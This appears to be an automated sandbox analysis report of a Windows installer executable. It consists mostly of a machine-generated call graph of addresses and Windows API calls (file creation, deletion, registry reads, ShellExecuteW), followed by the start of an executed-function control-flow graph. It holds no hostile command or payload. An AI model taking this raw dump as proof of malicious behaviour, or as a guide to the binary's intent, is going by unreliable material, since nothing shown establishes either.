RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3614 403ac1 3605->3614 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3617 406722 3 API calls 3608->3617 3609->3608 3615 405a4d GetFileAttributesW 3609->3615 3611->3606 3618 405b6c 3612->3618 3619 405a2a 3613->3619 3668 4060e7 3614->3668 3620 405a59 3615->3620 3616 405a9c 3616->3604 3621 405a69 3617->3621 3618->3614 3624 403e95 19 API calls 3618->3624 3619->3607 3620->3608 3622 406751 2 API calls 3620->3622 3812 406009 lstrcpynW 3621->3812 3622->3608 3625 405b7d 3624->3625 3626 405b89 ShowWindow LoadLibraryW 3625->3626 3627 405c0c 3625->3627 3629 405ba8 LoadLibraryW 3626->3629 3630 405baf GetClassInfoW 3626->3630 3818 405047 OleInitialize 3627->3818 3629->3630 3631 405bc3 GetClassInfoW RegisterClassW 3630->3631 3632 405bd9 DialogBoxParamW 3630->3632 3631->3632 3634 40141d 80 API calls 3632->3634 3633 405c12 3635 405c16 3633->3635 3636 405c2e 3633->3636 3637 405c01 3634->3637 3635->3614 3639 40141d 80 API calls 3635->3639 3638 40141d 80 API calls 3636->3638 3637->3614 3638->3614 3639->3614 3641 403871 3640->3641 3642 403863 CloseHandle 3640->3642 3966 403c83 3641->3966 3642->3641 3648 405cb5 3647->3648 3649 403aef ExitProcess 3648->3649 3650 405ccb MessageBoxIndirectW 3648->3650 3650->3649 3651->3473 4023 406009 lstrcpynW 3652->4023 3654 40678f 3655 405d59 4 API calls 3654->3655 3656 406795 3655->3656 3657 406038 5 API calls 3656->3657 3664 403a97 3656->3664 3663 4067a5 3657->3663 3658 4067dd lstrlenW 3659 4067e4 3658->3659 3658->3663 3660 406722 3 API calls 3659->3660 3662 4067ea GetFileAttributesW 3660->3662 3661 4062d5 2 API calls 3661->3663 3662->3664 3663->3658 3663->3661 3663->3664 3665 406751 2 API calls 3663->3665 3664->3483 3666 406009 lstrcpynW 3664->3666 3665->3658 3666->3519 3667->3486 3669 406110 3668->3669 3670 4060f3 3668->3670 3672 406187 3669->3672 3673 40612d 3669->3673 3676 406104 3669->3676 3671 4060fd CloseHandle 3670->3671 3670->3676 3671->3676 3674 406190 lstrcatW lstrlenW WriteFile 3672->3674 3672->3676 3673->3674 3675 406136 GetFileAttributesW 3673->3675 3674->3676 4024 405e50 GetFileAttributesW CreateFileW 3675->4024 3676->3483 3678 406152 3678->3676 3679 406162 WriteFile 3678->3679 3680 40617c SetFilePointer 3678->3680 3679->3680 3680->3672 3681->3509 3682->3514 3683->3529 3697 406812 3684->3697 3685 406a7f 3686 403b6c DeleteFileW 3685->3686 4027 406009 lstrcpynW 3685->4027 3686->3527 3686->3529 3688 4068d3 GetVersion 3700 4068e0 3688->3700 3689 406a46 lstrlenW 3689->3697 3690 406805 10 API calls 3690->3689 3693 405ed3 3 API calls 3693->3700 3694 406952 GetSystemDirectoryW 3694->3700 3695 406965 GetWindowsDirectoryW 3695->3700 3696 406038 5 API calls 3696->3697 3697->3685 3697->3688 3697->3689 3697->3690 3697->3696 4025 405f51 wsprintfW 3697->4025 4026 406009 lstrcpynW 3697->4026 3698 406805 10 API calls 3698->3700 3699 4069df lstrcatW 3699->3697 3700->3693 3700->3694 3700->3695 3700->3697 3700->3698 3700->3699 3701 406999 SHGetSpecialFolderLocation 3700->3701 3701->3700 3702 4069b1 SHGetPathFromIDListW CoTaskMemFree 3701->3702 3702->3700 3704 4062fc 3 API calls 3703->3704 3705 406c6f 3704->3705 3707 406c90 3705->3707 4028 406a99 lstrcpyW 3705->4028 3707->3529 3709 405c7a 3708->3709 3710 405c6e CloseHandle 3708->3710 3709->3529 3710->3709 3712 40139d 80 API calls 3711->3712 3713 401432 3712->3713 3713->3495 3720 406045 3714->3720 3715 4060bb 3716 4060c1 CharPrevW 3715->3716 3718 4060e1 3715->3718 3716->3715 3717 4060ae CharNextW 3717->3715 3717->3720 3718->3549 3719 405d06 CharNextW 3719->3720 3720->3715 3720->3717 3720->3719 3721 40609a CharNextW 3720->3721 3722 4060a9 CharNextW 3720->3722 3721->3720 3722->3717 3724 4037ea CreateDirectoryW 3723->3724 3725 40673f lstrcatW 3723->3725 3726 405e7f 3724->3726 3725->3724 3727 405e8c GetTickCount GetTempFileNameW 3726->3727 3728 405ec2 3727->3728 3729 4037fe 3727->3729 3728->3727 3728->3729 3729->3475 3730->3556 3731->3558 3733 406760 3732->3733 3734 4035f3 3733->3734 3735 406766 CharPrevW 3733->3735 3736 406009 lstrcpynW 3734->3736 3735->3733 3735->3734 3736->3562 3738 403357 3737->3738 3738->3576 3740 4032f3 3739->3740 3741 4032db 3739->3741 3744 403303 GetTickCount 3740->3744 3745 4032fb 3740->3745 3742 4032e4 DestroyWindow 3741->3742 3743 4032eb 3741->3743 3742->3743 3743->3565 3747 403311 CreateDialogParamW ShowWindow 3744->3747 3748 403334 3744->3748 3774 406332 3745->3774 3747->3748 3748->3565 3750->3571 3753 403398 3751->3753 3752 4033c3 3755 403336 ReadFile 3752->3755 3753->3752 3785 403368 SetFilePointer 3753->3785 3756 4033ce 3755->3756 3757 4033e7 GetTickCount 3756->3757 3758 403518 3756->3758 3760 4033d2 3756->3760 3770 4033fa 3757->3770 3759 40351c 3758->3759 3764 403540 3758->3764 3761 403336 ReadFile 3759->3761 3760->3580 3761->3760 3762 403336 ReadFile 3762->3764 3763 403336 ReadFile 3763->3770 3764->3760 3764->3762 3765 40355f WriteFile 3764->3765 3765->3760 3766 403574 3765->3766 3766->3760 3766->3764 3768 40345c GetTickCount 3768->3770 3769 403485 MulDiv wsprintfW 3786 404f72 3769->3786 3770->3760 3770->3763 3770->3768 3770->3769 3772 4034c9 WriteFile 3770->3772 3778 407312 3770->3778 3772->3760 3772->3770 3773->3572 3775 40634f PeekMessageW 3774->3775 3776 406345 DispatchMessageW 3775->3776 3777 403301 3775->3777 3776->3775 3777->3565 3779 407332 3778->3779 3780 40733a 3778->3780 3779->3770 3780->3779 3781 4073c2 GlobalFree 3780->3781 3782 4073cb GlobalAlloc 3780->3782 3783 407443 GlobalAlloc 3780->3783 3784 40743a GlobalFree 3780->3784 3781->3782 3782->3779 3782->3780 3783->3779 3783->3780 3784->3783 3785->3752 3787 404f8b 3786->3787 3796 40502f 3786->3796 3788 404fa9 lstrlenW 3787->3788 3789 406805 18 API calls 3787->3789 3790 404fd2 3788->3790 3791 404fb7 lstrlenW 3788->3791 3789->3788 3793 404fe5 3790->3793 3794 404fd8 SetWindowTextW 3790->3794 3792 404fc9 lstrcatW 3791->3792 3791->3796 3792->3790 3795 404feb SendMessageW SendMessageW SendMessageW 3793->3795 3793->3796 3794->3793 3795->3796 3796->3770 3798 403ea9 3797->3798 3826 405f51 wsprintfW 3798->3826 3800 403f1d 3801 406805 18 API calls 3800->3801 3802 403f29 SetWindowTextW 3801->3802 3804 403f44 3802->3804 3803 403f5f 3803->3595 3804->3803 3805 406805 18 API calls 3804->3805 3805->3804 3806->3592 3808 405f07 RegQueryValueExW 3807->3808 3809 405989 3807->3809 3810 405f29 RegCloseKey 3808->3810 3809->3590 3809->3591 3810->3809 3812->3597 3827 406009 lstrcpynW 3813->3827 3815 403e88 3816 406722 3 API calls 3815->3816 3817 403e8e lstrcatW 3816->3817 3817->3616 3828 403daf 3818->3828 3820 40506a 3823 4062a3 11 API calls 3820->3823 3825 405095 3820->3825 3831 40139d 3820->3831 3821 403daf SendMessageW 3822 4050a5 OleUninitialize 3821->3822 3822->3633 3823->3820 3825->3821 3826->3800 3827->3815 3829 403dc7 3828->3829 3830 403db8 SendMessageW 3828->3830 3829->3820 3830->3829 3834 4013a4 3831->3834 3832 401410 3832->3820 3834->3832 3835 4013dd MulDiv SendMessageW 3834->3835 3836 4015a0 3834->3836 3835->3834 3837 4015fa 3836->3837 3916 40160c 3836->3916 3838 401601 3837->3838 3839 401742 3837->3839 3840 401962 3837->3840 3841 4019ca 3837->3841 3842 40176e 3837->3842 3843 401650 3837->3843 3844 4017b1 3837->3844 3845 401672 3837->3845 3846 401693 3837->3846 3847 401616 3837->3847 3848 4016d6 3837->3848 3849 401736 3837->3849 3850 401897 3837->3850 3851 4018db 3837->3851 3852 40163c 3837->3852 3853 4016bd 3837->3853 3837->3916 3866 4062a3 11 API calls 3838->3866 3858 401751 ShowWindow 3839->3858 3859 401758 3839->3859 3863 40145c 18 API calls 3840->3863 3856 40145c 18 API calls 3841->3856 3860 40145c 18 API calls 3842->3860 3943 4062a3 lstrlenW wvsprintfW 3843->3943 3949 40145c 3844->3949 3861 40145c 18 API calls 3845->3861 3946 401446 3846->3946 3855 40145c 18 API calls 3847->3855 3872 401446 18 API calls 3848->3872 3848->3916 3849->3916 3965 405f51 wsprintfW 3849->3965 3862 40145c 18 API calls 3850->3862 3867 40145c 18 API calls 3851->3867 3857 401647 PostQuitMessage 3852->3857 3852->3916 3854 4062a3 11 API calls 3853->3854 3869 4016c7 SetForegroundWindow 3854->3869 3870 40161c 3855->3870 3871 4019d1 SearchPathW 3856->3871 3857->3916 3858->3859 3873 401765 ShowWindow 3859->3873 3859->3916 3874 401775 3860->3874 3875 401678 3861->3875 3876 40189d 3862->3876 3877 401968 GetFullPathNameW 3863->3877 3866->3916 3868 4018e2 3867->3868 3880 40145c 18 API calls 3868->3880 3869->3916 3881 4062a3 11 API calls 3870->3881 3871->3916 3872->3916 3873->3916 3884 4062a3 11 API calls 3874->3884 3885 4062a3 11 API calls 3875->3885 3961 4062d5 FindFirstFileW 3876->3961 3887 40197f 3877->3887 3929 4019a1 3877->3929 3879 40169a 3889 4062a3 11 API calls 3879->3889 3890 4018eb 3880->3890 3891 401627 3881->3891 3893 401785 SetFileAttributesW 3884->3893 3894 401683 3885->3894 3911 4062d5 2 API calls 3887->3911 3887->3929 3888 4062a3 11 API calls 3896 4017c9 3888->3896 3897 4016a7 Sleep 3889->3897 3899 40145c 18 API calls 3890->3899 3900 404f72 25 API calls 3891->3900 3902 40179a 3893->3902 3893->3916 3909 404f72 25 API calls 3894->3909 3954 405d59 CharNextW CharNextW 3896->3954 3897->3916 3898 4019b8 GetShortPathNameW 3898->3916 3907 4018f5 3899->3907 3900->3916 3901 40139d 65 API calls 3901->3916 3908 4062a3 11 API calls 3902->3908 3903 4018c2 3912 4062a3 11 API calls 3903->3912 3904 4018a9 3910 4062a3 11 API calls 3904->3910 3914 4062a3 11 API calls 3907->3914 3908->3916 3909->3916 3910->3916 3915 401991 3911->3915 3912->3916 3913 4017d4 3917 401864 3913->3917 3920 405d06 CharNextW 3913->3920 3938 4062a3 11 API calls 3913->3938 3918 401902 MoveFileW 3914->3918 3915->3929 3964 406009 lstrcpynW 3915->3964 3916->3834 3917->3894 3919 40186e 3917->3919 3921 401912 3918->3921 3922 40191e 3918->3922 3923 404f72 25 API calls 3919->3923 3925 4017e6 CreateDirectoryW 3920->3925 3921->3894 3927 401942 3922->3927 3932 4062d5 2 API calls 3922->3932 3928 401875 3923->3928 3925->3913 3926 4017fe GetLastError 3925->3926 3930 401827 GetFileAttributesW 3926->3930 3931 40180b GetLastError 3926->3931 3937 4062a3 11 API calls 3927->3937 3960 406009 lstrcpynW 3928->3960 3929->3898 3929->3916 3930->3913 3934 4062a3 11 API calls 3931->3934 3935 401929 3932->3935 3934->3913 3935->3927 3940 406c68 42 API calls 3935->3940 3936 401882 SetCurrentDirectoryW 3936->3916 3939 40195c 3937->3939 3938->3913 3939->3916 3941 401936 3940->3941 3942 404f72 25 API calls 3941->3942 3942->3927 3944 4060e7 9 API calls 3943->3944 3945 401664 3944->3945 3945->3901 3947 406805 18 API calls 3946->3947 3948 401455 3947->3948 3948->3879 3950 406805 18 API calls 3949->3950 3951 401488 3950->3951 3952 401497 3951->3952 3953 406038 5 API calls 3951->3953 3952->3888 3953->3952 3955 405d76 3954->3955 3956 405d88 3954->3956 3955->3956 3957 405d83 CharNextW 3955->3957 3958 405dac 3956->3958 3959 405d06 CharNextW 3956->3959 3957->3958 3958->3913 3959->3956 3960->3936 3962 4018a5 3961->3962 3963 4062eb FindClose 3961->3963 3962->3903 3962->3904 3963->3962 3964->3929 3965->3916 3967 403c91 3966->3967 3968 403876 3967->3968 3969 403c96 FreeLibrary GlobalFree 3967->3969 3970 406c9b 3968->3970 3969->3968 3969->3969 3971 40677e 18 API calls 3970->3971 3972 406cae 3971->3972 3973 406cb7 DeleteFileW 3972->3973 3974 406cce 3972->3974 4014 403882 OleUninitialize 3973->4014 3975 406e4b 3974->3975 4018 406009 lstrcpynW 3974->4018 3981 4062d5 2 API calls 3975->3981 4003 406e58 3975->4003 3975->4014 3977 406cf9 3978 406d03 lstrcatW 3977->3978 3979 406d0d 3977->3979 3980 406d13 3978->3980 3982 406751 2 API calls 3979->3982 3984 406d23 lstrcatW 3980->3984 3985 406d19 3980->3985 3983 406e64 3981->3983 3982->3980 3988 406722 3 API calls 3983->3988 3983->4014 3987 406d2b lstrlenW FindFirstFileW 3984->3987 3985->3984 3985->3987 3986 4062a3 11 API calls 3986->4014 3989 406e3b 3987->3989 3993 406d52 3987->3993 3990 406e6e 3988->3990 3989->3975 3992 4062a3 11 API calls 3990->3992 3991 405d06 CharNextW 3991->3993 3994 406e79 3992->3994 3993->3991 3997 406e18 FindNextFileW 3993->3997 4006 406c9b 72 API calls 3993->4006 4013 404f72 25 API calls 3993->4013 4015 4062a3 11 API calls 3993->4015 4016 404f72 25 API calls 3993->4016 4017 406c68 42 API calls 3993->4017 4019 406009 lstrcpynW 3993->4019 4020 405e30 GetFileAttributesW 3993->4020 3995 405e30 2 API calls 3994->3995 3996 406e81 RemoveDirectoryW 3995->3996 4000 406ec4 3996->4000 4001 406e8d 3996->4001 3997->3993 3999 406e30 FindClose 3997->3999 3999->3989 4002 404f72 25 API calls 4000->4002 4001->4003 4004 406e93 4001->4004 4002->4014 4003->3986 4005 4062a3 11 API calls 4004->4005 4007 406e9d 4005->4007 4006->3993 4009 404f72 25 API calls 4007->4009 4011 406ea7 4009->4011 4012 406c68 42 API calls 4011->4012 4012->4014 4013->3997 4014->3491 4014->3492 4015->3993 4016->3993 4017->3993 4018->3977 4019->3993 4021 405e4d DeleteFileW 4020->4021 4022 405e3f SetFileAttributesW 4020->4022 4021->3993 4022->4021 4023->3654 4024->3678 4025->3697 4026->3697 4027->3686 4029 406ae7 GetShortPathNameW 4028->4029 4030 406abe 4028->4030 4031 406b00 4029->4031 4032 406c62 4029->4032 4054 405e50 GetFileAttributesW CreateFileW 4030->4054 4031->4032 4034 406b08 WideCharToMultiByte 4031->4034 4032->3707 4034->4032 4036 406b25 WideCharToMultiByte 4034->4036 4035 406ac7 CloseHandle GetShortPathNameW 4035->4032 4037 406adf 4035->4037 4036->4032 4038 406b3d wsprintfA 4036->4038 4037->4029 4037->4032 4039 406805 18 API calls 4038->4039 4040 406b69 4039->4040 4055 405e50 GetFileAttributesW CreateFileW 4040->4055 4042 406b76 4042->4032 4043 406b83 GetFileSize GlobalAlloc 4042->4043 4044 406ba4 ReadFile 4043->4044 4045 406c58 CloseHandle 4043->4045 4044->4045 4046 406bbe 4044->4046 4045->4032 4046->4045 4056 405db6 lstrlenA 4046->4056 4049 406bd7 lstrcpyA 4052 406bf9 4049->4052 4050 406beb 4051 405db6 4 API calls 4050->4051 4051->4052 4053 406c30 SetFilePointer WriteFile GlobalFree 4052->4053 4053->4045 4054->4035 4055->4042 4057 405df7 lstrlenA 4056->4057 4058 405dd0 lstrcmpiA 4057->4058 4059 405dff 4057->4059 4058->4059 4060 405dee CharNextA 4058->4060 4059->4049 4059->4050 4060->4057 4938 402a84 4939 401553 19 API calls 4938->4939 4940 402a8e 4939->4940 4941 401446 18 API calls 4940->4941 4942 402a98 4941->4942 4943 401a13 4942->4943 4944 402ab2 RegEnumKeyW 4942->4944 4945 402abe RegEnumValueW 4942->4945 4946 402a7e 4944->4946 4945->4943 4945->4946 4946->4943 4947 4029e4 RegCloseKey 4946->4947 4947->4943 4948 402c8a 4949 402ca2 4948->4949 4950 402c8f 4948->4950 4952 40145c 18 API calls 4949->4952 4951 401446 18 API calls 4950->4951 4954 402c97 4951->4954 4953 402ca9 lstrlenW 4952->4953 4953->4954 4955 402ccb WriteFile 4954->4955 4956 401a13 4954->4956 4955->4956 4957 40400d 4958 40406a 4957->4958 4959 40401a lstrcpynA lstrlenA 4957->4959 4959->4958 4960 40404b 4959->4960 4960->4958 4961 404057 GlobalFree 4960->4961 4961->4958 4962 401d8e 4963 40145c 18 API calls 4962->4963 4964 401d95 ExpandEnvironmentStringsW 4963->4964 4965 401da8 4964->4965 4967 401db9 4964->4967 4966 401dad lstrcmpW 4965->4966 4965->4967 4966->4967 4968 401e0f 4969 401446 18 API calls 4968->4969 4970 401e17 4969->4970 4971 401446 18 API calls 4970->4971 4972 401e21 4971->4972 4973 4030e3 4972->4973 4975 405f51 wsprintfW 4972->4975 4975->4973 4976 402392 4977 40145c 18 API calls 4976->4977 4978 402399 4977->4978 4981 4071f8 4978->4981 4982 406ed2 25 API calls 4981->4982 4983 407218 4982->4983 4984 407222 lstrcpynW lstrcmpW 4983->4984 4985 4023a7 4983->4985 4986 407254 4984->4986 4987 40725a lstrcpynW 4984->4987 4986->4987 4987->4985 4061 402713 4076 406009 lstrcpynW 4061->4076 4063 40272c 4077 406009 lstrcpynW 4063->4077 4065 402738 4066 40145c 18 API calls 4065->4066 4068 402743 4065->4068 4066->4068 4067 402752 4070 40145c 18 API calls 4067->4070 4072 402761 4067->4072 4068->4067 4069 40145c 18 API calls 4068->4069 4069->4067 4070->4072 4071 40145c 18 API calls 4073 40276b 4071->4073 4072->4071 4074 4062a3 11 API calls 4073->4074 4075 40277f WritePrivateProfileStringW 4074->4075 4076->4063 4077->4065 4988 402797 4989 40145c 18 API calls 4988->4989 4990 4027ae 4989->4990 4991 40145c 18 API calls 4990->4991 4992 4027b7 4991->4992 4993 40145c 18 API calls 4992->4993 4994 4027c0 GetPrivateProfileStringW lstrcmpW 4993->4994 4995 402e18 4996 40145c 18 API calls 4995->4996 4997 402e1f FindFirstFileW 4996->4997 4998 402e32 4997->4998 5003 405f51 wsprintfW 4998->5003 5000 402e43 5004 406009 lstrcpynW 5000->5004 5002 402e50 5003->5000 5004->5002 5005 401e9a 5006 40145c 18 API calls 5005->5006 5007 401ea1 5006->5007 5008 401446 18 API calls 5007->5008 5009 401eab wsprintfW 5008->5009 4127 401a1f 4128 40145c 18 API calls 4127->4128 4129 401a26 4128->4129 4130 4062a3 11 API calls 4129->4130 4131 401a49 4130->4131 4132 401a64 4131->4132 4133 401a5c 4131->4133 4181 406009 lstrcpynW 4132->4181 4180 406009 lstrcpynW 4133->4180 4136 401a62 4140 406038 5 API calls 4136->4140 4137 401a6f 4138 406722 3 API calls 4137->4138 4139 401a75 lstrcatW 4138->4139 4139->4136 4142 401a81 4140->4142 4141 4062d5 2 API calls 4141->4142 4142->4141 4143 405e30 2 API calls 4142->4143 4145 401a98 CompareFileTime 4142->4145 4146 401ba9 4142->4146 4150 4062a3 11 API calls 4142->4150 4154 406009 lstrcpynW 4142->4154 4160 406805 18 API calls 4142->4160 4167 405ca0 MessageBoxIndirectW 4142->4167 4171 401b50 4142->4171 4178 401b5d 4142->4178 4179 405e50 GetFileAttributesW CreateFileW 4142->4179 4143->4142 4145->4142 4147 404f72 25 API calls 4146->4147 4149 401bb3 4147->4149 4148 404f72 25 API calls 4151 401b70 4148->4151 4152 40337f 37 API calls 4149->4152 4150->4142 4155 4062a3 11 API calls 4151->4155 4153 401bc6 4152->4153 4156 4062a3 11 API calls 4153->4156 4154->4142 4162 401b8b 4155->4162 4157 401bda 4156->4157 4158 401be9 SetFileTime 4157->4158 4159 401bf8 FindCloseChangeNotification 4157->4159 4158->4159 4161 401c09 4159->4161 4159->4162 4160->4142 4163 401c21 4161->4163 4164 401c0e 4161->4164 4166 406805 18 API calls 4163->4166 4165 406805 18 API calls 4164->4165 4168 401c16 lstrcatW 4165->4168 4169 401c29 4166->4169 4167->4142 4168->4169 4170 4062a3 11 API calls 4169->4170 4172 401c34 4170->4172 4173 401b93 4171->4173 4174 401b53 4171->4174 4175 405ca0 MessageBoxIndirectW 4172->4175 4176 4062a3 11 API calls 4173->4176 4177 4062a3 11 API calls 4174->4177 4175->4162 4176->4162 4177->4178 4178->4148 4179->4142 4180->4136 4181->4137 5010 40209f GetDlgItem GetClientRect 5011 40145c 18 API calls 5010->5011 5012 4020cf LoadImageW SendMessageW 5011->5012 5013 4030e3 5012->5013 5014 4020ed DeleteObject 5012->5014 5014->5013 5015 402b9f 5016 401446 18 API calls 5015->5016 5021 402ba7 5016->5021 5017 402c4a 5018 402bdf ReadFile 5020 402c3d 5018->5020 5018->5021 5019 401446 18 API calls 5019->5020 5020->5017 5020->5019 5027 402d17 ReadFile 5020->5027 5021->5017 5021->5018 5021->5020 5022 402c06 MultiByteToWideChar 5021->5022 5023 402c3f 5021->5023 5025 402c4f 5021->5025 5022->5021 5022->5025 5028 405f51 wsprintfW 5023->5028 5025->5020 5026 402c6b SetFilePointer 5025->5026 5026->5020 5027->5020 5028->5017 5029 402b23 GlobalAlloc 5030 402b39 5029->5030 5031 402b4b 5029->5031 5032 401446 18 API calls 5030->5032 5033 40145c 18 API calls 5031->5033 5034 402b41 5032->5034 5035 402b52 WideCharToMultiByte lstrlenA 5033->5035 5036 402b93 5034->5036 5037 402b84 WriteFile 5034->5037 5035->5034 5037->5036 5038 402384 GlobalFree 5037->5038 5038->5036 5040 4044a5 5041 404512 5040->5041 5042 4044df 5040->5042 5044 40451f GetDlgItem GetAsyncKeyState 5041->5044 5051 4045b1 5041->5051 5108 405c84 GetDlgItemTextW 5042->5108 5047 40453e GetDlgItem 5044->5047 5054 40455c 5044->5054 5045 4044ea 5048 406038 5 API calls 5045->5048 5046 40469d 5106 404833 5046->5106 5110 405c84 GetDlgItemTextW 5046->5110 5049 403d3f 19 API calls 5047->5049 5050 4044f0 5048->5050 5053 404551 ShowWindow 5049->5053 5056 403e74 5 API calls 5050->5056 5051->5046 5057 406805 18 API calls 5051->5057 5051->5106 5053->5054 5059 404579 SetWindowTextW 5054->5059 5064 405d59 4 API calls 5054->5064 5055 403dca 8 API calls 5060 404847 5055->5060 5061 4044f5 GetDlgItem 5056->5061 5062 40462f SHBrowseForFolderW 5057->5062 5058 4046c9 5063 40677e 18 API calls 5058->5063 5065 403d3f 19 API calls 5059->5065 5066 404503 IsDlgButtonChecked 5061->5066 5061->5106 5062->5046 5067 404647 CoTaskMemFree 5062->5067 5068 4046cf 5063->5068 5069 40456f 5064->5069 5070 404597 5065->5070 5066->5041 5071 406722 3 API calls 5067->5071 5111 406009 lstrcpynW 5068->5111 5069->5059 5075 406722 3 API calls 5069->5075 5072 403d3f 19 API calls 5070->5072 5073 404654 5071->5073 5076 4045a2 5072->5076 5077 40468b SetDlgItemTextW 5073->5077 5082 406805 18 API calls 5073->5082 5075->5059 5109 403d98 SendMessageW 5076->5109 5077->5046 5078 4046e6 5080 4062fc 3 API calls 5078->5080 5089 4046ee 5080->5089 5081 4045aa 5085 4062fc 3 API calls 5081->5085 5083 404673 lstrcmpiW 5082->5083 5083->5077 5086 404684 lstrcatW 5083->5086 5084 404730 5112 406009 lstrcpynW 5084->5112 5085->5051 5086->5077 5088 404739 5090 405d59 4 API calls 5088->5090 5089->5084 5094 406751 2 API calls 5089->5094 5095 404785 5089->5095 5091 40473f GetDiskFreeSpaceW 5090->5091 5093 404763 MulDiv 5091->5093 5091->5095 5093->5095 5094->5089 5097 4047e2 5095->5097 5098 4043ad 21 API calls 5095->5098 5096 404805 5113 403d85 EnableWindow 5096->5113 5097->5096 5099 40141d 80 API calls 5097->5099 5100 4047d3 5098->5100 5099->5096 5102 4047e4 SetDlgItemTextW 5100->5102 5103 4047d8 5100->5103 5102->5097 5104 4043ad 21 API calls 5103->5104 5104->5097 5105 404821 5105->5106 5114 403d61 5105->5114 5106->5055 5108->5045 5109->5081 5110->5058 5111->5078 5112->5088 5113->5105 5115 403d74 SendMessageW 5114->5115 5116 403d6f 5114->5116 5115->5106 5116->5115 5117 402da5 5118 4030e3 5117->5118 5119 402dac 5117->5119 5120 401446 18 API calls 5119->5120 5121 402db8 5120->5121 5122 402dbf SetFilePointer 5121->5122 5122->5118 5123 402dcf 5122->5123 5123->5118 5125 405f51 wsprintfW 5123->5125 5125->5118 5126 4030a9 SendMessageW 5127 4030c2 InvalidateRect 5126->5127 5128 4030e3 5126->5128 5127->5128 5129 401cb2 5130 40145c 18 API calls 5129->5130 5131 401c54 5130->5131 5132 4062a3 11 API calls 5131->5132 5135 401c64 5131->5135 5133 401c59 5132->5133 5134 406c9b 81 API calls 5133->5134 5134->5135 4078 4021b5 4079 40145c 18 API calls 4078->4079 4080 4021bb 4079->4080 4081 40145c 18 API calls 4080->4081 4082 4021c4 4081->4082 4083 40145c 18 API calls 4082->4083 4084 4021cd 4083->4084 4085 40145c 18 API calls 4084->4085 4086 4021d6 4085->4086 4087 404f72 25 API calls 4086->4087 4088 4021e2 ShellExecuteW 4087->4088 4089 40221b 4088->4089 4090 40220d 4088->4090 4092 4062a3 11 API calls 4089->4092 4091 4062a3 11 API calls 4090->4091 4091->4089 4093 402230 4092->4093 5143 402238 5144 40145c 18 API calls 5143->5144 5145 40223e 5144->5145 5146 4062a3 11 API calls 5145->5146 5147 40224b 5146->5147 5148 404f72 25 API calls 5147->5148 5149 402255 5148->5149 5150 405c3f 2 API calls 5149->5150 5151 40225b 5150->5151 5152 4062a3 11 API calls 5151->5152 5155 4022ac CloseHandle 5151->5155 5158 40226d 5152->5158 5154 4030e3 5155->5154 5156 402283 WaitForSingleObject 5157 402291 GetExitCodeProcess 5156->5157 5156->5158 5157->5155 5160 4022a3 5157->5160 5158->5155 5158->5156 5159 406332 2 API calls 5158->5159 5159->5156 5162 405f51 wsprintfW 5160->5162 5162->5155 5163 4040b8 5164 4040d3 5163->5164 5172 404201 5163->5172 5168 40410e 5164->5168 5194 403fca WideCharToMultiByte 5164->5194 5165 40426c 5166 404276 GetDlgItem 5165->5166 5167 40433e 5165->5167 5169 404290 5166->5169 5170 4042ff 5166->5170 5173 403dca 8 API calls 5167->5173 5175 403d3f 19 API calls 5168->5175 5169->5170 5178 4042b6 6 API calls 5169->5178 5170->5167 5179 404311 5170->5179 5172->5165 5172->5167 5174 40423b GetDlgItem SendMessageW 5172->5174 5177 404339 5173->5177 5199 403d85 EnableWindow 5174->5199 5176 40414e 5175->5176 5181 403d3f 19 API calls 5176->5181 5178->5170 5182 404327 5179->5182 5183 404317 SendMessageW 5179->5183 5186 40415b CheckDlgButton 5181->5186 5182->5177 5187 40432d SendMessageW 5182->5187 5183->5182 5184 404267 5185 403d61 SendMessageW 5184->5185 5185->5165 5197 403d85 EnableWindow 5186->5197 5187->5177 5189 404179 GetDlgItem 5198 403d98 SendMessageW 5189->5198 5191 40418f SendMessageW 5192 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5191->5192 5193 4041ac GetSysColor 5191->5193 5192->5177 5193->5192 5195 404007 5194->5195 5196 403fe9 GlobalAlloc WideCharToMultiByte 5194->5196 5195->5168 5196->5195 5197->5189 5198->5191 5199->5184 4094 401eb9 4095 401f24 4094->4095 4096 401ec6 4094->4096 4097 401f53 GlobalAlloc 4095->4097 4098 401f28 4095->4098 4099 401ed5 4096->4099 4106 401ef7 4096->4106 4100 406805 18 API calls 4097->4100 4105 4062a3 11 API calls 4098->4105 4110 401f36 4098->4110 4101 4062a3 11 API calls 4099->4101 4104 401f46 4100->4104 4102 401ee2 4101->4102 4107 402708 4102->4107 4112 406805 18 API calls 4102->4112 4104->4107 4108 402387 GlobalFree 4104->4108 4105->4110 4116 406009 lstrcpynW 4106->4116 4108->4107 4118 406009 lstrcpynW 4110->4118 4111 401f06 4117 406009 lstrcpynW 4111->4117 4112->4102 4114 401f15 4119 406009 lstrcpynW 4114->4119 4116->4111 4117->4114 4118->4104 4119->4107 5200 4074bb 5202 407344 5200->5202 5201 407c6d 5202->5201 5203 4073c2 GlobalFree 5202->5203 5204 4073cb GlobalAlloc 5202->5204 5205 407443 GlobalAlloc 5202->5205 5206 40743a GlobalFree 5202->5206 5203->5204 5204->5201 5204->5202 5205->5201 5205->5202 5206->5205

                                                                                  Executed Functions

                                                                                  Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304filestringcomCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 146 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 153 403923-403937 call 405d06 CharNextW 146->153 154 40391b-40391e 146->154 157 4039ca-4039d0 153->157 154->153 158 4039d6 157->158 159 40393c-403942 157->159 160 4039f5-403a0d GetTempPathW call 4037cc 158->160 161 403944-40394a 159->161 162 40394c-403950 159->162 169 403a33-403a4d DeleteFileW call 403587 160->169 170 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 160->170 161->161 161->162 164 403952-403957 162->164 165 403958-40395c 162->165 164->165 167 4039b8-4039c5 call 405d06 165->167 168 40395e-403965 165->168 167->157 183 4039c7 167->183 172 403967-40396e 168->172 173 40397a-40398c call 403800 168->173 186 403acc-403adb call 403859 OleUninitialize 169->186 187 403a4f-403a55 169->187 170->169 170->186 174 403970-403973 172->174 175 403975 172->175 184 4039a1-4039b6 call 403800 173->184 185 40398e-403995 173->185 174->173 174->175 175->173 183->157 184->167 202 4039d8-4039f0 call 407d6e call 406009 184->202 189 403997-40399a 185->189 190 40399c 